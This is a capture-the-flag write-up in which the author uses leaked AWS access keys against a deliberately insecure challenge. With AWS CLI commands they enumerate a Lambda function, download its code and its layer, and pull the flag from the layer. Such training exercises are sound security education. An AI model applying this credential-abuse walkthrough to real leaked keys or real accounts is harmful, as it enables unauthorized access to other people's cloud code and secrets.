SecurityLabs challenge: Week 7 (Insecure Lambdas)
Another Tuesday, another challenge!
"We are back with another challenge of the week. Our Security team discovered some access keys belonging to a lambda function called myFunction in us-east-2 region. Help them and get the flag."
Set up the credentials and get a session token
aws sts get-session-token --duration 1800(optional) Verify user
aws sts get-caller-identity
{
"UserId": "AID...",
"Account": "redacted",
"Arn": "arn:aws:iam::redacted:user/challenge-7"
}
Let's see if we can download the function and inspect the code
aws lambda --region us-east-2 get-function --function-name myFunction
{
"Configuration": {
"FunctionName": "myFunction",
"FunctionArn": "arn:aws:lambda:us-east-2:redacted:function:myFunction",
"Runtime": "python3.8",
"Role": "arn:aws:iam::redacted:role/service-role/myFunction-role-pg5cgb2a",
"Handler": "lambda_function.lambda_handler",
"CodeSize": 255,
"Description": "",
"Timeout": 3,
"MemorySize": 128,
"LastModified": "2022-03-22T15:07:47.000+0000",
"CodeSha256": "nope",
"Version": "$LATEST",
"TracingConfig": {
"Mode": "PassThrough"
},
"RevisionId": "redacted",
"Layers": [
{
"Arn": "arn:aws:lambda:us-east-2:redacted:layer:challenge-7:1",
"CodeSize": 378
}
],
"State": "Active",
"LastUpdateStatus": "Successful",
"PackageType": "Zip",
"Architectures": [
"x86_64"
]
},
"Code": {
"RepositoryType": "S3",
"Location": "https://awslambda-us-east-2-tasks.s3.us-east-2.amazonaws.com/snapshots/redacted/myFunction-2b2eb97e-2758-49b2-9981-932d4f2bd567?versionId=SBmsIao3tPl41Kk_IkcHjzkvJYb7KW&X-Amz-Security-Token=(redacted)"
}
}
wget this package using the location provided. Then unzip and look at the Code
from seclabs import get_flag
def lambda_handler(event, context):
return {
'statusCode': 200,
'body': 'Hello from Lambda!'
}
Looks pretty unassuming...except that import. Let's try invoking the lambda and see what happens
aws lambda --region us-east-2 invoke --function-name myFunction .
An error occurred (AccessDeniedException) when calling the Invoke operation: User: arn:aws:iam::584358494719:user/challenge-7 is not authorized to perform: lambda:InvokeFunction on resource: arn:aws:lambda:us-east-2:redacted:function:myFunction because no identity-based policy allows the lambda:InvokeFunction action
Well, poop. Let's go back to our "get-function" output. We see this lambda uses a layer (99.9% sure it's for that import).
arn:aws:lambda:us-east-2:redacted:layer:challenge-7:1
So, if you dont know, Lambda Layers are additional zip files of code or other content that your lambda may access. They reduce the deployment size of your function and can make maintenance easier by keeping functions separate from boilerplate code. Let's see if we can download that layer?
aws lambda --region us-east-2 --get-layer-version --layer-name challenge-7 --version-number 1
{
"Content": {
"Location": "https://awslambda-us-east-2-layers.s3.us-east-2.amazonaws.com/snapshots/redacted/challenge-7-1652086d-a340-4c0f-be18-125805a77101?versionId=SY3K0bK_kUT0MB9a.g7iHwoUsEVUG7&X-Amz-Security-Token=redacted",
"CodeSize": 378
},
"LayerArn": "arn:aws:lambda:us-east-2:redacted:layer:challenge-7",
"LayerVersionArn": "arn:aws:lambda:us-east-2:redacted:layer:challenge-7:1",
"Description": "",
"CreatedDate": "2022-03-22T15:06:44.178+0000",
"Version": 1,
"CompatibleRuntimes": [
"python3.7",
"python3.9",
"python3.8"
],
"CompatibleArchitectures": [
"x86_64"
]
}
And once again wget that sucker down, unzip, and inspect the code.
flag = "flag(flag)\n You can find more interesting challenges and learning materials at SecurityLabs. Register for beta at https://www.securitylabs.tech in case you haven't\n Have fun hacking cloud with SecurityLabs"
Oh, I am having fun, don't you worry!
*On a sad note, These challenges are being paused for an indefinite amount of time. My assumption is a problem with AWS not liking insecure public resources, or access keys shared. Scott Piper/flAWS just had this same issue, and almost had his whole account stuffed...